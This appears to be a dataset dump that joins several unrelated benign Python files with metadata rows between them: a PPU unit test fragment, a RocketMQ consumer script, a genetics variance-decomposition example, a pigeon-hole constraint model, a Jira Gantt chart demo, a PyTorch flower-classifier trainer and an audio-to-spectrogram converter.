        self.ppu.background_enable = False
        self.assertEqual(0b00000000, self.ppu.mask)
        self.assertEqual(False, self.ppu.background_enable)
    def test_ppu_toogle_background2(self):
        """ctrl and mask flags are independent of each other."""
        self.assertEqual(0b00000000, self.ppu.ctrl)
        self.assertEqual(0b00000000, self.ppu.mask)
        self.ppu.nmi_enable = True
        self.ppu.sprite_enable = True
        self.assertEqual(0b10000000, self.ppu.ctrl)
        self.assertEqual(True, self.ppu.nmi_enable)
        self.assertEqual(0b00010000, self.ppu.mask)
        self.assertEqual(True, self.ppu.sprite_enable)
| 2,075 | 12 | 239 |
9c32b01abcbb815a323cd7c3687055b5fdcd01bf | 1,667 | py | Python | test/PushConsumer.py | GangLuICT/RMQ-Client4Python | 5a7cfe2efc1e6c009090b891d0a4fb0dc03ce3e4 | [
"MIT"
] | 32 | 2016-08-26T02:35:42.000Z | 2021-12-03T02:31:45.000Z | test/PushConsumer.py | GangLuICT/RMQ-Client4Python | 5a7cfe2efc1e6c009090b891d0a4fb0dc03ce3e4 | [
"MIT"
] | null | null | null | test/PushConsumer.py | GangLuICT/RMQ-Client4Python | 5a7cfe2efc1e6c009090b891d0a4fb0dc03ce3e4 | [
"MIT"
] | 11 | 2016-12-14T09:17:33.000Z | 2021-01-08T13:31:07.000Z | #!/usr/bin/python
# -*- coding:utf-8 -*-
import logging
logger = logging.getLogger("PushConsumer")
# Import modules from the parent directory.
import sys
sys.path.append("..")
import settings_MQ as settings
# Start the JVM.
from jpype import *
jvmPath = getDefaultJVMPath()
startJVM(jvmPath, settings.JVM_OPTIONS, "-Djava.ext.dirs="+settings.JAVA_EXT_DIRS)
#startJVM(jvmPath, "-Djava.class.path=" + settings.RMQClientJAR + ":")
logger.info(java.lang.System.getProperty("java.class.path"))
logger.info(java.lang.System.getProperty("java.ext.dirs"))
# JPackage can only be used after the JVM has started; otherwise the jars are not found.
from MQPushConsumer import MQPushConsumer
from MQMessageListener import msgListenerConcurrentlyProxy, msgListenerOrderlyProxy
from MQMessage import ConsumeFromWhere, MessageModel
# Set the default encoding explicitly to support Chinese text input;
# this does not affect the encoding of the Message body.
import sys
if sys.getdefaultencoding() != 'utf-8':
    reload(sys)
    sys.setdefaultencoding('utf-8');
import time
if __name__ == '__main__':
    consumer = MQPushConsumer('MQClient4Python-Consumer', 'jfxr-7:9876;jfxr-6:9876')
    consumer.init()
    consumer.setMessageModel(MessageModel['CLUSTERING']) # defaults to CLUSTERING
    #consumer.setMessageModel(MessageModel.CLUSTERING) # defaults to CLUSTERING
    consumer.subscribe("RMQTopicTest", "TagB")
    consumer.setConsumeFromWhere(ConsumeFromWhere['CONSUME_FROM_LAST_OFFSET'])
    #consumer.setConsumeFromWhere(ConsumeFromWhere.CONSUME_FROM_LAST_OFFSET)
    #consumer.registerMessageListener(msgListenerConcurrentlyProxy)
    consumer.registerMessageListener(msgListenerOrderlyProxy)
    consumer.start()
    while True:
        time.sleep(1)
    # No shutdown is needed while listening, unless you really want to exit!
    #consumer.shutdown()
    # The JVM must not exit while listening either, unless you really want to exit!
    #shutdownJVM()
| 29.245614 | 84 | 0.769646 | #!/usr/bin/python
# -*- coding:utf-8 -*-
import logging
logger = logging.getLogger("PushConsumer")
# Import modules from the parent directory.
import sys
sys.path.append("..")
import settings_MQ as settings
# Start the JVM.
from jpype import *
jvmPath = getDefaultJVMPath()
startJVM(jvmPath, settings.JVM_OPTIONS, "-Djava.ext.dirs="+settings.JAVA_EXT_DIRS)
#startJVM(jvmPath, "-Djava.class.path=" + settings.RMQClientJAR + ":")
logger.info(java.lang.System.getProperty("java.class.path"))
logger.info(java.lang.System.getProperty("java.ext.dirs"))
# JPackage can only be used after the JVM has started; otherwise the jars are not found.
from MQPushConsumer import MQPushConsumer
from MQMessageListener import msgListenerConcurrentlyProxy, msgListenerOrderlyProxy
from MQMessage import ConsumeFromWhere, MessageModel
# Set the default encoding explicitly to support Chinese text input;
# this does not affect the encoding of the Message body.
import sys
if sys.getdefaultencoding() != 'utf-8':
    reload(sys)
    sys.setdefaultencoding('utf-8');
import time
if __name__ == '__main__':
    consumer = MQPushConsumer('MQClient4Python-Consumer', 'jfxr-7:9876;jfxr-6:9876')
    consumer.init()
    consumer.setMessageModel(MessageModel['CLUSTERING']) # defaults to CLUSTERING
    #consumer.setMessageModel(MessageModel.CLUSTERING) # defaults to CLUSTERING
    consumer.subscribe("RMQTopicTest", "TagB")
    consumer.setConsumeFromWhere(ConsumeFromWhere['CONSUME_FROM_LAST_OFFSET'])
    #consumer.setConsumeFromWhere(ConsumeFromWhere.CONSUME_FROM_LAST_OFFSET)
    #consumer.registerMessageListener(msgListenerConcurrentlyProxy)
    consumer.registerMessageListener(msgListenerOrderlyProxy)
    consumer.start()
    while True:
        time.sleep(1)
    # No shutdown is needed while listening, unless you really want to exit!
    #consumer.shutdown()
    # The JVM must not exit while listening either, unless you really want to exit!
| 0 | 0 | 0 |
50494232cb37bbd44d80e6b47816854f9df9e752 | 734 | py | Python | content/post/example.py | fboehm/blogdown-xmin | eda1ffb90645786f556fda89d748be4929ec3a1b | [
"MIT"
] | null | null | null | content/post/example.py | fboehm/blogdown-xmin | eda1ffb90645786f556fda89d748be4929ec3a1b | [
"MIT"
] | null | null | null | content/post/example.py | fboehm/blogdown-xmin | eda1ffb90645786f556fda89d748be4929ec3a1b | [
"MIT"
] | null | null | null | import numpy
from numpy.random import RandomState
from numpy.linalg import cholesky as chol
from limmbo.core.vdsimple import vd_reml
from limmbo.io.input import InputData
random = RandomState(15)
N = 100
S = 1000
P = 3
snps = (random.rand(N, S) < 0.2).astype(float)
kinship = numpy.dot(snps, snps.T) / float(10)
y = random.randn(N, P)
pheno = numpy.dot(chol(kinship), y)
pheno_ID = [ 'PID{}'.format(x+1) for x in range(P)]
samples = [ 'SID{}'.format(x+1) for x in range(N)]
datainput = InputData()
datainput.addPhenotypes(phenotypes = pheno,
phenotype_ID = pheno_ID, pheno_samples = samples)
datainput.addRelatedness(relatedness = kinship,
relatedness_samples = samples)
Cg, Cn, ptime = vd_reml(datainput, verbose=False)
Cg
Cn
ptime
| 29.36 | 51 | 0.739782 | import numpy
from numpy.random import RandomState
from numpy.linalg import cholesky as chol
from limmbo.core.vdsimple import vd_reml
from limmbo.io.input import InputData
random = RandomState(15)
N = 100
S = 1000
P = 3
snps = (random.rand(N, S) < 0.2).astype(float)
kinship = numpy.dot(snps, snps.T) / float(10)
y = random.randn(N, P)
pheno = numpy.dot(chol(kinship), y)
pheno_ID = [ 'PID{}'.format(x+1) for x in range(P)]
samples = [ 'SID{}'.format(x+1) for x in range(N)]
datainput = InputData()
datainput.addPhenotypes(phenotypes = pheno,
phenotype_ID = pheno_ID, pheno_samples = samples)
datainput.addRelatedness(relatedness = kinship,
relatedness_samples = samples)
Cg, Cn, ptime = vd_reml(datainput, verbose=False)
Cg
Cn
ptime
| 0 | 0 | 0 |
3f910aeb4d99e9e9031c69db1e7f38ffa5b6271f | 1,206 | py | Python | cpmpy/pigeon_hole.py | hakank/hakank | 313e5c0552569863047f6ce9ae48ea0f6ec0c32b | [
"MIT"
] | 279 | 2015-01-10T09:55:35.000Z | 2022-03-28T02:34:03.000Z | cpmpy/pigeon_hole.py | hakank/hakank | 313e5c0552569863047f6ce9ae48ea0f6ec0c32b | [
"MIT"
] | 10 | 2017-10-05T15:48:50.000Z | 2021-09-20T12:06:52.000Z | cpmpy/pigeon_hole.py | hakank/hakank | 313e5c0552569863047f6ce9ae48ea0f6ec0c32b | [
"MIT"
] | 83 | 2015-01-20T03:44:00.000Z | 2022-03-13T23:53:06.000Z | """
Pigeon hole problem in cpmpy.
ftp://ftp.inria.fr/INRIA/Projects/contraintes/publications/CLP-FD/plilp94.html
'''
pigeon: the pigeon-hole problem consists in putting n pigeons in m pigeon-holes (at most 1
pigeon per hole). The boolean formulation uses n × m variables to indicate, for each pigeon,
its hole number. Obviously, there is a solution iff n <= m.
'''
Model created by Hakan Kjellerstrand, hakank@hakank.com
See also my cpmpy page: http://www.hakank.org/cpmpy/
"""
import sys
import numpy as np
from cpmpy import *
from cpmpy.solvers import *
from cpmpy_hakank import *
# n: num pigeons
# m: n pigeon holes
n = 3
m = 10
pigeon_hole(n,m)
| 23.647059 | 92 | 0.678275 | """
Pigeon hole problem in cpmpy.
ftp://ftp.inria.fr/INRIA/Projects/contraintes/publications/CLP-FD/plilp94.html
'''
pigeon: the pigeon-hole problem consists in putting n pigeons in m pigeon-holes (at most 1
pigeon per hole). The boolean formulation uses n × m variables to indicate, for each pigeon,
its hole number. Obviously, there is a solution iff n <= m.
'''
Model created by Hakan Kjellerstrand, hakank@hakank.com
See also my cpmpy page: http://www.hakank.org/cpmpy/
"""
import sys
import numpy as np
from cpmpy import *
from cpmpy.solvers import *
from cpmpy_hakank import *
# n: num pigeons
# m: n pigeon holes
def pigeon_hole(n=3,m=10):
    """Enumerate every placement of n pigeons into m holes.

    Each hole may contain at most one pigeon and every pigeon must occupy
    exactly one hole; all solutions are printed and counted (there is a
    solution iff n <= m).
    """
    model = Model()
    # decision variables: p[i, j] is True when pigeon i occupies hole j
    p = boolvar(shape=(n,m),name="p")
    print("p:",p)
    # each hole hosts at most one pigeon
    for hole in range(m):
        model += (sum([p[(pigeon, hole)] for pigeon in range(n)]) <= 1)
    # each pigeon is assigned to exactly one hole
    for pigeon in range(n):
        model += (sum([p[(pigeon, hole)] for hole in range(m)]) == 1)
    solver = CPM_ortools(model)
    num_solutions = 0
    while solver.solve():
        num_solutions += 1
        print(p.value())
        print()
        # forbid the current assignment so the next solve() finds a new one
        get_different_solution(solver, p.flat)
    print("num_solutions:", num_solutions)
n = 3
m = 10
pigeon_hole(n,m)
| 529 | 0 | 22 |
7821407816ab91cff3c7ab71fa39529fe74d0c47 | 178 | py | Python | openxc/sinks/__init__.py | hopper-maker/openxc-python | 2054c3d7a7ba09b8f0eeecc2348185857dc22f5f | [
"BSD-3-Clause"
] | 81 | 2015-01-17T04:21:55.000Z | 2022-01-12T16:54:26.000Z | openxc/sinks/__init__.py | hopper-maker/openxc-python | 2054c3d7a7ba09b8f0eeecc2348185857dc22f5f | [
"BSD-3-Clause"
] | 84 | 2015-01-14T20:17:44.000Z | 2020-10-19T21:46:25.000Z | openxc/sinks/__init__.py | hopper-maker/openxc-python | 2054c3d7a7ba09b8f0eeecc2348185857dc22f5f | [
"BSD-3-Clause"
] | 32 | 2015-03-08T14:03:53.000Z | 2022-01-04T12:21:59.000Z | from .base import DataSink
from .queued import QueuedSink
from .notifier import MeasurementNotifierSink
from .recorder import FileRecorderSink
from .uploader import UploaderSink
| 29.666667 | 45 | 0.859551 | from .base import DataSink
from .queued import QueuedSink
from .notifier import MeasurementNotifierSink
from .recorder import FileRecorderSink
from .uploader import UploaderSink
| 0 | 0 | 0 |
2c3beeaf32055f3520f70b13ccb503bb41f01910 | 3,071 | py | Python | jira_gantt_demo.py | bobk/jiracharts | 2b7c700eea5a99e8450408e8835b54e110892fd6 | [
"MIT"
] | null | null | null | jira_gantt_demo.py | bobk/jiracharts | 2b7c700eea5a99e8450408e8835b54e110892fd6 | [
"MIT"
] | null | null | null | jira_gantt_demo.py | bobk/jiracharts | 2b7c700eea5a99e8450408e8835b54e110892fd6 | [
"MIT"
] | null | null | null |
# http://github.com/bobk/jiracharts
#
# This example code set uses various charting libraries, Python with jira-python and
# PowerShell with JiraPS to demonstrate generating useful charts and visualizations from Jira data
from jira import JIRA
import os
import datetime
# in this program we use both the gantt and plotly libraries as examples
# all variables for gantt are prefixed with gantt, variables for plotly are prefixed with plotly
import gantt
import plotly.figure_factory as plotlyff
if __name__== "__main__" :
main()
| 48.746032 | 158 | 0.722566 |
# http://github.com/bobk/jiracharts
#
# This example code set uses various charting libraries, Python with jira-python and
# PowerShell with JiraPS to demonstrate generating useful charts and visualizations from Jira data
from jira import JIRA
import os
import datetime
# in this program we use both the gantt and plotly libraries as examples
# all variables for gantt are prefixed with gantt, variables for plotly are prefixed with plotly
import gantt
import plotly.figure_factory as plotlyff
def main():
    """Fetch Jira epics and render them as Gantt charts.

    Connection settings come from the JIRA_* environment variables; the JQL
    query and the Epic Name custom field id must be adapted to the target
    Jira instance. Writes ganttchart.svg and opens a plotly chart in the
    browser.
    """
    # get our Jira connection information from env vars
    server = os.environ['JIRA_SERVER'] # e.g. http://myjiraservername:8080
    project = os.environ['JIRA_PROJECT'] # e.g. MYPROJECTNAME
    username = os.environ['JIRA_USERNAME'] # your Jira username (username if Jira server, email if Jira Cloud)
    password = os.environ['JIRA_PASSWORD'] # your password - note that for Jira Cloud you will need to use an API token
    # this program is not a demonstration of error-checking, it is a demonstration of charting
    # connect to the server
    options = { "server" : server }
    jira = JIRA(options, basic_auth=(username, password))
    # search for issues - REPLACE this with your query, the code assumes your query returns only Epics
    issues = jira.search_issues("(project=" + project + ") and (issuetype=Epic) order by created DESC", startAt=0)
    charttitle = "demo of Gantt chart of Jira epics"
    today = datetime.datetime.today()
    ganttchart = gantt.Project(charttitle)
    plotlylist = []
    for issue in issues:
        # REPLACE customfield_xxxxx below with your Jira instance's custom field identifier for Epic Name - get that value from the XML Export issue view on an Epic
        epicname = issue.fields.customfield_10102
        # construct the text for each Gantt bar and get the start/stop dates
        # created and duedate are generally present on every Jira instance - change these fields if you need to
        # e.g. you might also calculate the start date as the creation date of the earliest issue in the epic, and the end date as the end date of the latest issue
        taskname = epicname + " (" + issue.key + ") " + issue.fields.status.name
        startdate = datetime.datetime.strptime(issue.fields.created[0:10], '%Y-%m-%d')
        stopdate = datetime.datetime.strptime(issue.fields.duedate, '%Y-%m-%d')
        # add the task to the gantt chart
        gantttask = gantt.Task(name=taskname, start=startdate, stop=stopdate)
        ganttchart.add_task(gantttask)
        # add the task to the plotly chart
        plotlydictentry = dict(Task=taskname, Start=startdate, Finish=stopdate)
        plotlylist.append(plotlydictentry)
    # write the gantt chart to a file
    ganttchart.make_svg_for_tasks(filename="ganttchart.svg", today=today, scale=gantt.DRAW_WITH_WEEKLY_SCALE)
    # the plotly chart will pop up in the browser
    plotlyfig = plotlyff.create_gantt(plotlylist, title=charttitle, showgrid_x=True, show_hover_fill=True)
    plotlyfig.show()
if __name__== "__main__" :
main()
| 2,495 | 0 | 23 |
acb9334d64f5ab1ebdf08b5ba2bae76001fb9de8 | 7,698 | py | Python | train.py | hopems7/Image-Classifier | 20d5e56269909b9240da62fba3b949a64513c3bf | [
"MIT"
] | null | null | null | train.py | hopems7/Image-Classifier | 20d5e56269909b9240da62fba3b949a64513c3bf | [
"MIT"
] | null | null | null | train.py | hopems7/Image-Classifier | 20d5e56269909b9240da62fba3b949a64513c3bf | [
"MIT"
] | null | null | null | # imports here
import argparse
import time
import torch
from torch import nn
from torch import optim
import torch.nn.functional as F
import torchvision
from torchvision import datasets, models, transforms
import matplotlib.pyplot as plt
from collections import OrderedDict
# torchvision.datasets import ImageFolder
from torch.autograd import Variable
import numpy as np
from PIL import Image
print("Stop 1 - after imports")
if __name__ == "__main__":
main()
| 40.515789 | 147 | 0.573915 | # imports here
import argparse
import time
import torch
from torch import nn
from torch import optim
import torch.nn.functional as F
import torchvision
from torchvision import datasets, models, transforms
import matplotlib.pyplot as plt
from collections import OrderedDict
# torchvision.datasets import ImageFolder
from torch.autograd import Variable
import numpy as np
from PIL import Image
print("Stop 1 - after imports")
def parse_args():
    """Parse the training command-line flags and return the argparse Namespace.

    Every option is optional; numeric options keep their historical string
    defaults because callers cast learning_rate/epochs themselves.
    """
    print("Parsing..")
    parser = argparse.ArgumentParser()
    # (flag, add_argument keyword arguments) — identical flags and defaults
    option_specs = [
        ('--data_dir', dict(metavar='data_dir', type=str)),
        ('--arch', dict(dest='arch', default='densenet121', choices=['densenet121', 'vgg16'])),
        ('--save_dir', dict(dest='save_dir', action='store', default="checkpoint.pth")),
        ('--hidden_units', dict(action='store', dest='hidden_units', default='512')),
        ('--learning_rate', dict(action='store', dest='learning_rate', default='0.001')),
        ('--epochs', dict(dest='epochs', default='3')),
    ]
    for flag, kwargs in option_specs:
        parser.add_argument(flag, **kwargs)
    # if it fails maybe change the name for arch based on checkpoint save or add comment back
    return parser.parse_args()
def train_mode(model, criterion, optimizer, trainloader, epochs, validloader):
    """Train *model* for *epochs* passes over *trainloader*.

    Every `print_every` steps the model is evaluated on *validloader* and the
    running training loss, validation loss and accuracy are printed. Uses CUDA
    when available. Returns the trained model.
    """
    print("About to train")
    print_every = 10
    steps = 0
    #set the device
    device=torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    model.to(device)
    start=time.time()
    print("Start training: ")
    for e in range(epochs):
        running_loss = 0
        for inputs, labels in trainloader:
            steps += 1
            inputs, labels = inputs.to(device), labels.to(device)
            optimizer.zero_grad()
            # Forward and backward passes
            outputs = model.forward(inputs)
            loss = criterion(outputs, labels)
            loss.backward()
            optimizer.step()
            running_loss += loss.item()
            if steps % print_every == 0:
                # periodic validation pass (gradients disabled below)
                model.eval()
                validation_loss = 0
                accuracy=0
                for inputs2, labels2 in validloader:
                    # NOTE(review): zero_grad() has no effect here since no
                    # backward pass happens during validation
                    optimizer.zero_grad()
                    inputs2, labels2 = inputs2.to(device), labels2.to(device)
                    with torch.no_grad():
                        outputs = model.forward(inputs2)
                        # NOTE(review): `=` overwrites the loss each batch, so
                        # only the final batch's loss is averaged below —
                        # presumably `+=` was intended; confirm
                        validation_loss = criterion(outputs,labels2)
                        ps = torch.exp(outputs)
                        top_p, top_class = ps.topk(1, dim=1)
                        equals = top_class == labels2.view(*top_class.shape)
                        accuracy += torch.mean(equals.type(torch.FloatTensor)).item()
                validation_loss = validation_loss / len(validloader)
                accuracy = accuracy /len(validloader)
                print("Epoch: {}/{}... ".format(e+1, epochs),
                      "Training Loss: {:.4f}".format(running_loss/print_every),
                      "Validation Loss {:.4f}".format(validation_loss),
                      "Accuracy: {:.4f}".format(accuracy),
                      )
                running_loss = 0
                # back to training mode (re-enables dropout etc.)
                model.train()
    time_elapsed=time.time() - start
    print("\nTime spent training: {:.0f}m {:.0f}s".format(time_elapsed//60, time_elapsed % 60))
    return model
def save_checkpoint(model, optimizer, path, output_size, train_datasets, classifier, args):
    """Serialize the trained model plus training metadata to 'checkpoint.pth'.

    NOTE(review): the `path` and `classifier` parameters are unused — the file
    name is hard-coded and the classifier is read from `model.classifier`;
    confirm whether `path` should be honored.
    """
    print("Saving model...")
    # remember the class-index mapping so inference can translate predictions
    model.class_to_idx = train_datasets.class_to_idx
    #hidden units and input size pot issues - added args
    checkpoint={'pretrained_model': args.arch,
               # 'input_size': input_size,
                'output_size': output_size,
                'state_dict': model.state_dict(),
                'classifier': model.classifier,
                'class_to_idx': model.class_to_idx,
                'optimizer': optimizer.state_dict(),
                'epochs': args.epochs,
                'hidden_units': args.hidden_units,
                'learning_rate': args.learning_rate
               }
    torch.save(checkpoint, 'checkpoint.pth')
    print("Model Saved.")
def main():
    """Entry point: build dataloaders from the 'flowers' folder, assemble the
    chosen pretrained network with a fresh 102-way classifier head, train it,
    and save a checkpoint.

    Expects flowers/{train,valid,test} subfolders in ImageFolder layout.
    """
    print("in Main Module...")
    args = parse_args()
    data_dir='flowers'
    train_dir = data_dir + '/train'
    valid_dir = data_dir + '/valid'
    test_dir = data_dir + '/test'
    # deterministic transforms for evaluation; augmented transforms for training
    test_valid_transforms = transforms.Compose([transforms.Resize(224),
                                      transforms.CenterCrop(224),
                                      transforms.ToTensor(),
                                      transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
    train_transforms=transforms.Compose([transforms.RandomRotation(30),
                                       transforms.RandomResizedCrop(224),
                                       transforms.RandomHorizontalFlip(),
                                       transforms.ToTensor(),
                                       transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
    # Load the datasets with ImageFolder
    train_datasets= datasets.ImageFolder(train_dir, transform=train_transforms)
    test_datasets = datasets.ImageFolder(test_dir, transform=test_valid_transforms)
    valid_datasets = datasets.ImageFolder(valid_dir, transform=test_valid_transforms)
    # Using the image datasets and the trainforms, define the dataloaders
    trainloaders = torch.utils.data.DataLoader(train_datasets, batch_size=64, shuffle=True)
    testloaders= torch.utils.data.DataLoader(test_datasets, batch_size=64, shuffle= True)
    validloaders=torch.utils.data.DataLoader(valid_datasets, batch_size=64, shuffle=True)
    #load the model
    # NOTE(review): the model is loaded here and then re-loaded in the
    # branches below, so this first load is redundant — confirm
    model=getattr(models, args.arch)(pretrained=True)
    if args.arch == 'vgg16':
        model=models.vgg16(pretrained=True)
        classifier=nn.Sequential(OrderedDict([
                          ('fc1', nn.Linear(25088, 1024)),
                          ('dropout', nn.Dropout(p=0.5)),
                          ('relu1', nn.ReLU()),
                          ('fc2', nn.Linear(1024, 102)),
                          ('output', nn.LogSoftmax(dim=1))]))
    elif args.arch == 'densenet121':
        model=models.densenet121(pretrained=True)
        #this portion distinct from statement blocks
        classifier = nn.Sequential(OrderedDict([
            ('fc1', nn.Linear(1024, 500)),
            ('dropout', nn.Dropout(p=0.6)),
            ('relu1', nn.ReLU()),
            ('fc2', nn.Linear(500, 102)),
            ('output', nn.LogSoftmax(dim=1))
        ]))
    #turn off gradient
    # freeze the pretrained feature extractor; only the new head trains
    for param in model.parameters():
        param.requires_grad=False
    model.classifier = classifier
    criterion = nn.NLLLoss()
    optimizer = optim.Adam(model.classifier.parameters(), lr=float(args.learning_rate))
    epochs=int(args.epochs)
    class_idx=train_datasets.class_to_idx
    output_size=102
    train_mode(model, criterion, optimizer, trainloaders, epochs, validloaders)
    model.class_to_idx=class_idx
    path=args.save_dir
    save_checkpoint(model, optimizer, path, output_size, train_datasets, classifier, args)
    #prev from savecheck function(model, epochs, learning_rate, optimizer, input_size, file_path, output_size, train_datasets, hidden_units, arch):
if __name__ == "__main__":
main()
| 7,037 | 0 | 112 |
c6c28e50c265fd0709ef305063d99b46f340c8f8 | 24 | py | Python | tests/template_loader/__init__.py | dwatkinsweb/django-skin | 925db5313f564e2edca0ea2419b5d7b752a7a518 | [
"MIT"
] | 3 | 2015-10-07T17:59:01.000Z | 2017-11-16T11:19:13.000Z | tests/template_loader/__init__.py | dwatkinsweb/django-skin | 925db5313f564e2edca0ea2419b5d7b752a7a518 | [
"MIT"
] | null | null | null | tests/template_loader/__init__.py | dwatkinsweb/django-skin | 925db5313f564e2edca0ea2419b5d7b752a7a518 | [
"MIT"
] | 2 | 2017-11-15T01:25:56.000Z | 2022-01-06T23:39:32.000Z | __author__ = 'dwatkins'
| 12 | 23 | 0.75 | __author__ = 'dwatkins'
| 0 | 0 | 0 |
119566b17135a8fd6c0115e3229ed30435c39dcf | 363 | py | Python | src/servman/parcel.py | dggfi/Servman | 5415b2f952fd082a5b50d583c53eb6a21b83a296 | [
"MIT"
] | null | null | null | src/servman/parcel.py | dggfi/Servman | 5415b2f952fd082a5b50d583c53eb6a21b83a296 | [
"MIT"
] | null | null | null | src/servman/parcel.py | dggfi/Servman | 5415b2f952fd082a5b50d583c53eb6a21b83a296 | [
"MIT"
] | null | null | null | from typing import Literal, Any | 25.928571 | 79 | 0.592287 | from typing import Literal, Any
class Parcel:
    """A routed message exchanged between the service manager, clients and services.

    Attributes:
        routing: which endpoint type should receive the parcel
            ('servman', 'client' or 'service').
        destination_id: identifier of the receiving connection.
        action: name of the action the receiver should perform.
        data: arbitrary payload accompanying the action.
    """

    def __init__(
        self,
        # bug fix: `Literal['a'] or Literal['b'] or Literal['c']` is evaluated
        # at runtime and collapses to Literal['servman']; a single Literal
        # with all values expresses the intended union (PEP 586)
        routing: Literal['servman', 'client', 'service'],
        destination_id: str,
        action: str,
        data: Any
    ):
        self.routing = routing
        self.destination_id = destination_id
        self.action = action
        self.data = data
65e6116d33d8cbb4753140aa1fc3c8d721b23a9d | 722 | py | Python | src/numerical_utils/linalg.py | lpereira95/numerical_utils | 204bdab709f6f134dee16cb7142ae43b394b451a | [
"MIT"
] | null | null | null | src/numerical_utils/linalg.py | lpereira95/numerical_utils | 204bdab709f6f134dee16cb7142ae43b394b451a | [
"MIT"
] | null | null | null | src/numerical_utils/linalg.py | lpereira95/numerical_utils | 204bdab709f6f134dee16cb7142ae43b394b451a | [
"MIT"
] | null | null | null | import numpy as np
| 21.235294 | 75 | 0.583102 | import numpy as np
def is_sym(A, rtol=1e-5, atol=1e-8):
return np.allclose(A, A.T, rtol=rtol, atol=atol)
def create_tridiagonal(diag, diag_lower, diag_upper=None):
if diag_upper is None:
diag_upper = diag_lower
return np.diag(diag) + np.diag(diag_lower, -1) + np.diag(diag_upper, 1)
def get_max_band(A):
m = []
for j in range(A.shape[1]):
col = A[:, j]
m.append(np.max(np.abs(np.where(col != 0)[0] - j)))
return np.max(m)
def get_banded_sym_lower(A):
n = A.shape[0]
max_band = get_max_band(A)
A_band = np.empty((max_band + 1, n))
for j in range(n):
m = min(max_band + 1, (n - j))
A_band[:m, j] = A[j:(j + m), j]
return A_band
| 607 | 0 | 92 |
935f585f49031bde5efdefcb99f3e456bda692cf | 958 | py | Python | src/pytheas/services/project_service.py | dcronkite/pytheas | 3cdd6a21bda488e762931cbf5975964d5e574abd | [
"MIT"
] | null | null | null | src/pytheas/services/project_service.py | dcronkite/pytheas | 3cdd6a21bda488e762931cbf5975964d5e574abd | [
"MIT"
] | null | null | null | src/pytheas/services/project_service.py | dcronkite/pytheas | 3cdd6a21bda488e762931cbf5975964d5e574abd | [
"MIT"
] | null | null | null | from pytheas.data.projects import Project
import urllib.parse
| 26.611111 | 84 | 0.726514 | from pytheas.data.projects import Project
import urllib.parse
def get_project_names():
return [p.project_name for p in Project.objects()]
def get_project_by_name(project_name):
return Project.objects(project_name=project_name).first()
def get_project_by_url_name(project_name_url):
return Project.objects(project_name=urllib.parse.unquote_plus(project_name_url))
def get_project_details(project_name):
project = get_project_by_name(project_name)
return {
'name': project.project_name,
'description': project.description,
'start_date': project.start_date,
'end_date': project.end_date,
'name_url': urllib.parse.quote_plus(project.project_name),
}
def get_subprojects(project_name):
project = get_project_by_name(project_name)
return [
{'name': subproject,
'name_url': urllib.parse.quote_plus(subproject)
} for subproject in project.subprojects
]
| 775 | 0 | 115 |
a3fd027279b548953d0f5866c9bf6713ac534efa | 6,088 | py | Python | dd_widgets/audio_classification.py | jolibrain/dd_widgets | 74fe45d9442e611a6e3d0fdb5fc68d926afbbd1d | [
"Apache-2.0"
] | 4 | 2019-02-22T08:06:47.000Z | 2021-11-08T09:14:47.000Z | dd_widgets/audio_classification.py | jolibrain/dd_widgets | 74fe45d9442e611a6e3d0fdb5fc68d926afbbd1d | [
"Apache-2.0"
] | 1 | 2021-01-26T04:50:27.000Z | 2021-01-26T04:50:27.000Z | dd_widgets/audio_classification.py | jolibrain/dd_widgets | 74fe45d9442e611a6e3d0fdb5fc68d926afbbd1d | [
"Apache-2.0"
] | 4 | 2019-08-21T13:45:41.000Z | 2021-07-17T21:35:40.000Z | import logging
from pathlib import Path
from tempfile import mkstemp
from typing import Iterator, List, Optional
import glob
import matplotlib.pyplot as plt
import numpy as np
from IPython.display import Audio, Image, display
import cv2
import librosa
from tqdm import tqdm
from .mixins import ImageTrainerMixin
from .widgets import GPUIndex, Solver, Engine
def make_slice(total: int, size: int, step: int) -> Iterator[slice]:
"""
Sliding window over the melody. step should be less than or equal to size.
"""
if step > size:
logging.warn("step > size, you probably miss some part of the melody")
if total < size:
yield slice(0, total)
return
for t in range(0, total - size, step):
yield slice(t, t + size)
if t + size < total:
yield slice(total - size, total)
| 32.731183 | 80 | 0.545171 | import logging
from pathlib import Path
from tempfile import mkstemp
from typing import Iterator, List, Optional
import glob
import matplotlib.pyplot as plt
import numpy as np
from IPython.display import Audio, Image, display
import cv2
import librosa
from tqdm import tqdm
from .mixins import ImageTrainerMixin
from .widgets import GPUIndex, Solver, Engine
def make_slice(total: int, size: int, step: int) -> Iterator[slice]:
    """
    Sliding window over the melody. step should be less than or equal to size.

    Yields windows of *size* columns every *step* columns; when the last
    stride does not reach the end, a final right-aligned window is yielded so
    the tail of the melody is still covered.
    """
    if step > size:
        # logging.warn is a deprecated alias of logging.warning
        logging.warning("step > size, you probably miss some part of the melody")
    if total <= size:
        # bug fix: the original only handled total < size; at total == size the
        # loop below iterates zero times and `t` was unbound, raising NameError
        yield slice(0, total)
        return
    last_end = 0
    for start in range(0, total - size, step):
        yield slice(start, start + size)
        last_end = start + size
    if last_end < total:
        # right-aligned tail window covering the remainder
        yield slice(total - size, total)
def build_dir(src_dir: Path, dst_dir: Path):
    """Convert a class-per-folder tree of audio files into spectrogram images.

    For each audio file in each class folder of *src_dir*, computes an STFT
    magnitude spectrogram (dB scale) and writes 257-column windowed slices as
    .exr images into the matching class folder under *dst_dir*. Files whose
    slices already exist are skipped.
    """
    if not dst_dir.exists():
        dst_dir.mkdir()
    for directory in src_dir.glob("*"):
        new_dir = dst_dir / directory.stem
        if not new_dir.exists():
            new_dir.mkdir()
        # build the list first to get its size...
        file_list = list(directory.glob("*"))
        for file in tqdm(file_list, desc=directory.name):
            f = file.relative_to(src_dir)
            # do not open the file (long) if the image already exists!
            if sum(1 for _ in new_dir.glob(f"{f.stem}_*.exr")) == 0:
                #if sum(1 for _ in new_dir.glob("*/*.exr")) == 0:
                # if not (new_dir / f"{f.stem}_00000_00257.exr").exists():
                y, sr = librosa.load(file)
                # 2^9 seems a good compromise, maybe pass it as a parameter in
                # the future.
                D = librosa.stft(y, 2 ** 9, center=True)
                spec = librosa.amplitude_to_db(
                    librosa.magphase(D)[0], ref=np.max
                )
                # slide a 257-wide window with stride 100 over the spectrogram
                for slc in make_slice(spec.shape[1], 257, 100):
                    pattern = f"{f.stem}_{slc.start:>05d}_{slc.stop:>05d}.exr"
                    cv2.imwrite((new_dir / pattern).as_posix(), spec[:, slc])
